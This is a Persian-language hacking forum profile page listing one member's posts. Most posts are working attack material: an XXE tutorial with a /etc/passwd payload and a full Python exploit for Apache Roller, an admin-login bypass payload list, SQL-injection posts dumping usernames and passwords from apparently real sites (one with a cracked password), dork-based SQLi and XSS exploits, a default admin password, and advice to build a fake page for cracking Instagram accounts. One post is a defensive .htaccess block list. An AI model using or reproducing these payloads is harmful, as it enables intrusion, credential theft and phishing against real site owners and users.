رفتن به مطلب
بازگشایی انجمن! ×
GuardIran

MR.MSA

جاویدان
  • ارسال ها

    484
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    46

تمامی موارد ارسال شده توسط MR.MSA

  1. با سلام خدمت شما دوست عزیز . لطفا قبل از فعالیت قوانین انجمن رو مطالعه فرمایید . بند ۶ : 6) زبان رسمی انجمن پارسی می باشد و تمامی کاربران ملزم به پارسی نویسی هستند و لطفا از زبان های فینگلیش و یا انگلیسی و... اکیدا خود داری فرمایید. موفق باشید .
  2. بخش کاربردی و مهمیه که متاسفانه فعالان زیادی در انجمن نداره.. فعالیت خودتون رو شروع کنید تا توانایی شما در این زمینه مورد ارزیابی قرار بگیره. همونطور که مدیران سایت گفتن بخش مهم و کاربردی هست. با اشتیاق منتظر فعالیتتون هستیم.
  3. MR.MSA

    اکانت شودان

    خیلی هم عالی دوست عزیز . چون خیلی ها میان طبق کاری که دارن یوزرنیم میزارن و مناسب نیست گفتم ولی مثل اینکه شما نام مستعارتون هست . موفق باشید.
  4. MR.MSA

    اکانت شودان

    با سلام چند بار تذکر دادم بهتون !!!!! یوزرنیم مناسب برای خودتون انتخاب کنید . در بخش تنظیمات میتونید تغیرش بدید !!! و اینکه ابتدا قوانین رو مطالعه کنید بعد شروع به فعالیت کنید .
  5. با سلام خدمت دوستان عزیز گاردایران . در اینجا کدی رو قرار میدم که میتونید از اون برای جلوگیری از اسیب پذیری Sql Injection استفاده کنید اما این رو در نظر داشته باشید که فقط ایمن سازی با htaccess جالب نیست و بهتره در کنارش اسیب پذیری رو از طریق توابع و یا استفاده از PDO و .. رفع کنیم ، ایمن سازی با htaccess فقط برای محکم کاری هست . <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http:// [OR] RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=http%3A%2F%2F [OR] RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=(\.\.//?)+ [OR] RewriteCond %{QUERY_STRING} [a-zA-Z0-9_]=/([a-z0-9_.]//?)+ [NC,OR] RewriteCond %{QUERY_STRING} \=PHP[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12} [NC,OR] RewriteCond %{QUERY_STRING} (\.\./|\.\.) [OR] RewriteCond %{QUERY_STRING} ftp\: [NC,OR] RewriteCond %{QUERY_STRING} http\: [NC,OR] RewriteCond %{QUERY_STRING} https\: [NC,OR] RewriteCond %{QUERY_STRING} \=\|w\| [NC,OR] RewriteCond %{QUERY_STRING} ^(.*)/self/(.*)$ [NC,OR] RewriteCond %{QUERY_STRING} ^(.*)cPath=http://(.*)$ [NC,OR] RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} (<|%3C)([^s]*s)+cript.*(>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} (\<|%3C).*iframe.*(\>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} (<|%3C)([^i]*i)+frame.*(>|%3E) [NC,OR] RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [NC,OR] RewriteCond %{QUERY_STRING} base64_(en|de)code[^(]*\([^)]*\) [NC,OR] RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR] RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2}) [OR] RewriteCond %{QUERY_STRING} ^.*(\[|\]|\(|\)|<|>).* [NC,OR] RewriteCond %{QUERY_STRING} (NULL|OUTFILE|LOAD_FILE) [OR] RewriteCond %{QUERY_STRING} (\./|\../|\.../)+(motd|etc|bin) [NC,OR] RewriteCond %{QUERY_STRING} (localhost|loopback|127\.0\.0\.1) [NC,OR] RewriteCond %{QUERY_STRING} (<|>|'|%0A|%0D|%27|%3C|%3E|%00) [NC,OR] RewriteCond %{QUERY_STRING} concat[^\(]*\( [NC,OR] RewriteCond %{QUERY_STRING} union([^s]*s)+elect [NC,OR] RewriteCond %{QUERY_STRING} union([^a]*a)+ll([^s]*s)+elect [NC,OR] RewriteCond %{QUERY_STRING} (;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|drop|delete|update|cast|create|char|information_schema|table_name|convert|alter|declare|order|script|set|md5|benchmark|encode|extractvalue|rand()|concat|group_concat|from|From|,|.|+|order|by) [NC,OR] </IfModule> موفق و پیروز باشید .
  6. چرا قوانین رو نمیخونید ؟؟؟؟؟ سلام یعنی چی ؟؟؟ چرا اسپم میکنید دوست عزیز ،‌لطفا رعایت کنید حالم بد شد انقدر تذکر دادم به این و اون البته شما همتون یه دسته هستین از مدیران میخوام یا اکانت ایشون رو بن کنید یا امضاش رو پاک کنید برای یه اسپم الکی نمیگم بن برای تبلیغات برند های سطح پایین میگم . 😡
  7. MR.MSA

    (XXE Vulnerability | XML External Entity (XXE

    با سلام خدمت دوستان عزیز با اموزش اسیب پذیری XXE یا XML External Entity در خدمت شما هستیم . توضیجات اولیه :‌ با استفاده از این اسیب پذیری شما قادر به دسترسی به فایل های سمت سرور و سیستمی دارید این اسیب پذیری سمت سرور است و زمانی رخ میده که ارسال ورودی xml انجام شده باشه و بر ورودی ها نظارت نباشه و خوب کانفیگ نکرده باشن ، از مزایای دیگر اسیب پذیری میتوان به استخراج اطلاعات حساس اسکن پورت های باز و جعل درخواست سمت سرور رو انجام داد ، ضعفی که باعث می شود این آسیب پذیری به وجود آید سمت سرور است که با دستورات XML Parser انجام میشود و اگردرخوست های ورودی توسط کلاینت به سرور رو خوب کنترل نکرده باشند باعث میشه که نفوذگر با استفاده از دستورات XML Parser اقدام به حمله کند . آشنایی با XML Parser : XML Parser یک آبجکتی است که اکثر مرورگر ها اونو ساپورت می کنند می توانید داکیومنت ها و اطلاعات را نیز استخراج کند و همچنین اقدام به خواندن تگ های XML کنید . XPath Injection : اسیب پذیری XXE Injection خیلی شباهت داره به اسیب پذیری Xpath Injection که قبلا اموزشش رو در انجمن قرار دادم :‌ انواع حملات XXE : : Exploiting XXE to retrieve file در این حمله استخراج اطلاعات صورت میگیرد : Exploiting XXE to Perform SSRF attack در این حمله امکان ترکیب اسیب پذیری SSRF هم وجود دارد . :‌ Exploiting Blind XXE exfiltrate data out-of-band این حمله زمانی صورت می گیره که داده های حساس در حال انتقال از میان سرور و کاربر هستند و جایی که داده ها از سرور برنامه به سیستمی منتقل می شوند و هکر می تواند آن ها رو کنترل کند . توی این جلسه قراره به حمله Exploiting XXE to retrieve file بپردازیم : برای مثال شما یک فرم رو سابمیت میکنید یا هر چیز دیگه بعد با استفاده از ابزار Burp Suite درخواست ها رو برسی میکنید و برای مثال این کد رو مشاهده میکنید :‌ <?xml version=”1.0” encoding=”UTF-8”?> و در این تگ برخی از این پارامتر ها اومده :‌ <stockCheck><productld>2</productld><storeld>1</storeld></stockCheck> حالا اگر بین این دو تگ این دستور xml رو قرار دهید و پارامتر ۲ را تغییر دهید فایل passwd رو فراخوانی میکنه : <!DOCTYPE test[<!ENTITY xxe SYSTEM “file:///etc/passwd”>]> کد اولیه (بدون هیچ تغییر ) :‌ <?xml version=”1.0” encoding=”UTF-8”?><stockCheck><productld>2</productld><storeld>1</storeld></stockCheck> و تبدیلش میکنیم به این :‌ <?xml version=”1.0” encoding=”UTF-8”?> <!DOCTYPE test[<!ENTITY xxe SYSTEM “file:///etc/passwd”>]> <stockCheck><productld>&xxe;</productld><storeld>1</storeld></stockCheck> و توی پاسخ میبینید که فایل passwd رو فراخوانی کرده ، در ضمن باید توی burp از قسمت repeater اقدام کنید . ویدئو : تئوری . پروژه محور یک . پروژه محور دو . اکسپلویت :‌ # Exploit Title: Apache Roller 5.0.3 - XML External Entity Injection (File Disclosure) # Google Dork: intext:"apache roller weblogger version {vulnerable_version_number}" # Date: 2018-09-05 # Exploit Author: Marko Jokic # Contact: [Hidden Content] # Vendor Homepage: [Hidden Content] # Software Link: [Hidden Content] # Version: < 5.0.3 # Tested on: Linux Ubuntu 14.04.1 # CVE : CVE-2014-0030 # This exploit lets you read almost any file on a vulnerable server via XXE vulnerability. # There are two types of payload this exploit is able to use, 'SIMPLE' & 'ADVANCED'. # 'SIMPLE' payload will work in most cases and will be used by default, if # server errors out, use 'ADVANCED' payload. # 'ADVANCED' payload will start local web server and serve malicious XML which # will be parsed by a target server. # To successfully perform attack with 'ADVANCED' payload, make sure that port # you listen on (--lport flag) is accessible out of the network. #!/usr/bin/env python import SimpleHTTPServer import SocketServer import argparse import sys import threading from xml.etree import ElementTree import urllib3 import requests SIMPLE_PAYLOAD = """<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ELEMENT foo ANY> <!ENTITY xxe SYSTEM "file://{}">]> <methodCall> <methodName>&xxe;</methodName> </methodCall> """ ADVANCED_PAYLOAD = """<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE foo [ <!ENTITY % start "<![CDATA["> <!ENTITY % xxe SYSTEM "file://{}"> <!ENTITY % end "]]>"> <!ENTITY % dtd SYSTEM "{}"> %dtd; ]> <methodCall> <methodName>&all;</methodName> </methodCall> """ urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) class MyHandler(SimpleHTTPServer.SimpleHTTPRequestHandler): def do_GET(self): self.send_response(200) self.send_header('Content-Type', 'text/html') self.end_headers() self.wfile.write('<!ENTITY all "%start;%xxe;%end;">') def check_exploit(host): response = requests.post(host + "/roller-services/xmlrpc", verify=False) if response.status_code == 200: return True return False def exploit(host, payload): response = requests.post(host + "/roller-services/xmlrpc", data=payload, verify=False) xml_tree = ElementTree.fromstring(response.text) parsed_response = xml_tree.findall("fault/value/struct/member")[1][1].text print parsed_response def start_web_server(port): handler = MyHandler httpd = SocketServer.TCPServer(('', port), handler, False) httpd.allow_reuse_address = True httpd.server_bind() httpd.server_activate() httpd.handle_request() httpd.shutdown() def main(): parser = argparse.ArgumentParser() parser.add_argument('-u', metavar="URL", dest="url", required=True, help="Target URL") parser.add_argument('-f', metavar='FILE', dest="file", required=False, default="/etc/passwd", help="File to read from server") parser.add_argument('--lhost', required='--rport' in sys.argv, help="Your IP address for http web server") parser.add_argument('--lport', type=int, required='--rhost' in sys.argv, help="Port for web server to listen on") args = parser.parse_args() host = args.url full_file_path = args.file advanced = False lhost = args.lhost lport = args.lport if lport is not None and lport is not None: advanced = True check = check_exploit(host) if check: if advanced: th = threading.Thread(target=start_web_server, args=(lport,)) th.daemon = True th.start() payload = ADVANCED_PAYLOAD.format(full_file_path, "[Hidden Content](lhost, lport)) else: payload = SIMPLE_PAYLOAD.format(full_file_path) exploit(host, payload) else: print "[-] TARGET IS NOT VULNERABLE!" main() مقاله : یک سری مقاله که میتونه خیلی مفید باشه . Owasp : [Hidden Content]_Processing Owasp : [Hidden Content] Doddsecurity : [Hidden Content] Medium : [Hidden Content] Exploit DB : [Hidden Content] ====================================================================== لایک فراموش نشه ، موفق و پیروز باشید .
  8. MR.MSA

    Admin Page ByPass

    با سلام خدمت دوستان گاردایران دوستانی رو توی بخش دیفیس دیدم که میگن برای admin page bypass به غیر از '=''or' چه چیز های دیگه ای میتونیم برای بایپس کردن استفاده کنیم . در این پست براتون کد ها رو میزارم . or 1=1 or 1=1-- or 1=1# or 1=1/* admin' -- admin' # admin'/* admin' or '1'='1 admin' or '1'='1'-- admin' or '1'='1'# admin' or '1'='1'/* admin'or 1=1 or ''=' admin' or 1=1 admin' or 1=1-- admin' or 1=1# admin' or 1=1/* admin') or ('1'='1 admin') or ('1'='1'-- admin') or ('1'='1'# admin') or ('1'='1'/* admin') or '1'='1 admin') or '1'='1'-- admin') or '1'='1'# admin') or '1'='1'/* admin" -- admin" # admin"/* admin" or "1"="1 admin" or "1"="1"-- admin" or "1"="1"# admin" or "1"="1"/* admin"or 1=1 or ""=" admin" or 1=1 admin" or 1=1-- admin" or 1=1# admin" or 1=1/* admin") or ("1"="1 admin") or ("1"="1"-- admin") or ("1"="1"# admin") or ("1"="1"/* admin") or "1"="1 admin") or "1"="1"-- admin") or "1"="1"# admin") or "1"="1"/* موفق و پیروز باشید .
  9. MR.MSA

    تارگت های Sql Injection

    18)[Hidden Content],2,3,group_concat(username,0x3a,password,%27%3Cbr%3E%27),5,6,7,8,9,10+/*!12345from*/+login-- 19)[Hidden Content],2,3,group_concat(username,0x3a,password),5+from+users-- 20)[Hidden Content],2,3,group_concat(userid,0x3a,passwd,%27%3Cbr%3E%27),5,6,7+from+cmsuser--
  10. MR.MSA

    تارگت های Sql Injection

    17) [Hidden Content],2,3,4,5,group_concat(userName,0x3a,password,%27%3CBr%3E%27),7,8,9+from+p_admin--+ user : peace pass : 7a447473a85a846f0f56a792912d5c7f || cracked : pak@123
  11. اول قوانین رو بخونید !!!!!!!! یوزرنیم مناسب انتخاب کنید . یه مشکلی پیش اومده بود یوزرنیم هر دوتون خراب شده بود 🙄. ولی بعد اوکی شد .
  12. +MSACMS & MSACMS New Version : 1.5.0 ورژن جدید رونمایی میکند !!! ========================================== : Guardiran Exploit Database guexdb.mr-msa.xyz توی این ساب دامنه جدید !! ۵۲ اکسپلویت در بخش vip انجمن رو قرار دادم و در آینده اکسپلویت های خیلی زیادی رو میزارم . جهت کمک در اکسپلویت های بیشتر پی وی بنده مراجعه کنید . نکته بسیار مهم : جهت دریافت پسورد پی وی مراجعه کنید . ========================================== Discord Server اضافه شدن بخش دیسکورد برای جوین شدن و... [Hidden Content] (با vpn مراجعه کنید ) ========================================== تغییرات نسخه جدید : ۱- برسی تنظیمات ArvanCloud ۲- اضافه شدن ساب دامنه guexdb.mr-msa.xyz ۳- اضافه شدن ۳ ابزار جدید در دامنه tools.mr-msa.xyz ۴- اضافه شدن بخش Discord در دامنه اصلی ۵- بهبود سازی سرعت سایت و سئو ۶- بهبود سازی یه سری مسائل امنیتی در ساب دامنه ها و... ۷- استارت ساب دامنه جدید ۸- استارت سی ام اس اختصاصی ------------------------------------------------------------------------ موفق و پیروز باشید .
  13. MR.MSA

    Dynamic Experts Solution Design Default Admin Password

    اکسپلویت جدید در رابطه با تنظیمات دیفالت : Dynamic Experts Solution Design Default Admin Password ###################### Exploit Title : Dynamic Experts Solution Design Default Admin Password Vendor Homepage : [Hidden Content] Google Dork : "Designed & Developed By : Dynamic Experts Solution" Date: 2020-06-29 Tested On : Win 10 / Mozilla Firefox ###################### # # username : admin # password : Admin123 # ###################### # demo 1 : username: [Hidden Content],2,3,4,5,6,7,8,9,username,11,12,13,14%20/*!12345from*/%20%20users-- password: [Hidden Content],2,3,4,5,6,7,8,9,password,11,12,13,14%20/*!12345from*/%20%20users-- # demo 2 : username & password: [Hidden Content],2222,3333,4444,/*!50000group_concat(username,0x3a,password,0x3c62723e)*/,6,7,8,9,10,11,12,13,14/*!50000from*/%20users--# # demo 3 : username & password: [Hidden Content],2,3,4,5,6,group_concat(username,0x3a,password),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34%20/*!12345from*/%20users--+ # demo 4 : username : [Hidden Content],2,3,4,5,6,7,8,9,username,11,12,13,14%20/*!12345froM*/%20users-- password: [Hidden Content],2,3,4,5,6,7,8,9,password,11,12,13,14%20/*!12345froM*/%20users--
  14. MR.MSA

    Sql injection Exploit

    Exploit 22 : RedJasmin Sql injection vulnerability # Exploit Title : RedJasmin Sql injection vulnerability # Date : 18/11/2016 # Vendor Homepage : www.redjasmin.com # Google Dork : "Designed & Developed by Redjasmin.com" # category : webapps # Tested on : windows 7 ,firefox Proof of Concept : search google Dork : "Designed & Developed by Redjasmin.com" Demo : [Hidden Content] injrction vulnerability] Demo : [Hidden Content] injrction vulnerability]
  15. MR.MSA

    کرک اینستا

    با سلام خدمت شما دوست عزیز . میتونید فیک پیج بسازید . تشریف بیارید سرور دیسکورد تا راهنمایی کنم .
  16. MR.MSA

    اکسپلویت اسیب پذیری XSS

    با سلام خدمت دوستان عزیز . با یک اکسپلویت در رابطه با باگ XSS در خدمتتون هستیم . ********************************************************* #Exploit Title: MotionsMedia – Cross Site Scripting #Date: 2020-08-25 #Google Dork: "Site Created by MotionsMedia" #Category:webapps #Tested On: windows 10, Firefox Proof of Concept: Search google Dork: "Site Created by MotionsMedia" Demo : [Hidden Content](%27xss%27)%3C/script%3E
  17. MR.MSA

    Sql injection Exploit

    Exploit 21 : Media Network – Blind Sql Injection Vulnerability #Exploit Title: Media Network – Blind Sql Injection Vulnerability #Date: 2020-08-17 #Vendor Homepage: [Hidden Content] #Google Dork: "Powered by Media Network" #Category:webapps #Tested On: windows 10, Firefox [+] First add "and true" and then "and false" to the end of the link : * Target.com/index.php?lang=1 true * Target.com/index.php?lang=1 false ### Demo 1: * [Hidden Content] * [Hidden Content] * [Hidden Content](@@version,1,1)=5 ### Demo 2: * [Hidden Content]/preview_news.php?id=54%20and%20true * [Hidden Content]/preview_news.php?id=54%20and%20false * [Hidden Content]/preview_news.php?id=54%20and%20substring(@@version,1,1)=1
  18. MR.MSA

    Sql injection Exploit

    Exploit 20 : QPlusHost - SQL Injection vulnerability ********************************************************* #Exploit Title: QPlusHost - SQL Injection vulnerability #Date: 2020-08-26 #Vendor Homepage: [Hidden Content] and [Hidden Content] #Google Dork: "Powered by QPlusHost.com" or "Powered by QPC.co.th" #Category:webapps #Tested On: windows 10, Firefox Proof of Concept: Search google Dork: "Powered by QPlusHost.com" Demo 1: [Hidden Content],2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105-- Demo 2: [Hidden Content],2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31-- Demo 3: [Hidden Content],2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46-- Demo 4: [Hidden Content],2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- Demo 5: [Hidden Content],2,3,4,version(),6,7,8,9,10,11,12,13-- Demo 6: [Hidden Content],2,3,4,version(),6,7,8,9,10,11,12,13,14,15--+
  19. MR.MSA

    Sql injection Exploit

    Exploit 19 : Viper Online – SQL Injection vulnerability ********************************************************* #Exploit Title: Viper Online – SQL Injection vulnerability #Date: 2020-08-26 #Vendor Homepage: [Hidden Content] #Google Dork: "Website by: Viper Online" #Category:webapps #Tested On: windows 10, Firefox Demo : [Hidden Content]()--+
  20. MR.MSA

    Sql injection Exploit

    Exploit 18 : MANIA - SQL Injection vulnerability ********************************************************* #Exploit Title: MANIA - SQL Injection vulnerability #Date: 2020-09-01 #Google Dork: "Made by MANIA" #Category:webapps #Tested On: windows 10, Firefox Proof of Concept: Search google Dork: "Made by MANIA" Demo 1: [Hidden Content],version(),33333,44444,55555-- Demo 2: [Hidden Content],version(),3,4,5--
  21. MR.MSA

    Sql injection Exploit

    Exploit 17 : Codegrap - SQL Injection vulnerability ********************************************************* #Exploit Title: Codegrap - SQL Injection vulnerability #Date: 2020-09-01 #Vendor Homepage: [Hidden Content] #Google Dork: "by Codegrap" #Category:webapps #Tested On: windows 10, Firefox Proof of Concept: Search google Dork: "by Codegrap" Demo 1: [Hidden Content],2,3,4,5,6,7,8,9,version(),11,12,13,14,15--+ Demo 2: [Hidden Content],2,3,4,5,6,version(),8,9,10,11--+
  22. MR.MSA

    Sql injection Exploit

    Exploit 16 : ebbuild - SQL Injection vulnerability ********************************************************* #Exploit Title: Webbuild - SQL Injection vulnerability #Date: 2020-09-01 #Vendor Homepage: [Hidden Content] #Google Dork: "Design by Webbuild" #Category:webapps #Tested On: windows 10, Firefox Proof of Concept: Search google Dork: "Design by Webbuild" Demo 1: [Hidden Content],/*!12345gRoup_concAt(username,0x3a,password)*/,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20%20/*!12345from*/%20admin-- Demo 2: [Hidden Content],/*!50000unhex(hex(grouP_coNcat(id,username,0x3a,password,0x3C62723E)))*/,3,4%20/*!50000fRom*/%20admin--#
  23. MR.MSA

    Sql injection Exploit

    Exploit 15 : Powered by Media NX - SQL Injection vulnerability ********************************************************* #Exploit Title: Powered by Media NX - SQL Injection vulnerability #Date: 2020-09-12 #Google Dork: "Powered by Media NX" #Category:webapps #Tested On: windows 10, Firefox Proof of Concept: Search google Dork: "Powered by Media NX" Demo 1: [Hidden Content]()--# Demo 2: [Hidden Content],2,3,4,5,6,7,version(),9,10,11--+ Demo 3: [Hidden Content],version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
  24. MR.MSA

    Sql injection Exploit

    Exploit 14 : Designed by : Shinja - SQL Injection vulnerability #Exploit Title: Designed by : Shinja - SQL Injection vulnerability #Date: 2020-09-23 #Vendor Homepage: [Hidden Content] #Google Dork: "Designed by : Shinja Pvt. Ltd." #Category:webapps #Tested On: windows 10, Firefox Proof of Concept: Search google Dork: "Designed by : Shinja Pvt. Ltd." Demo 1: [Hidden Content],2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,version(),34,35,36,37,38,39,40,41--+ Demo 2: [Hidden Content],2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63--+
×
×
  • ایجاد مورد جدید...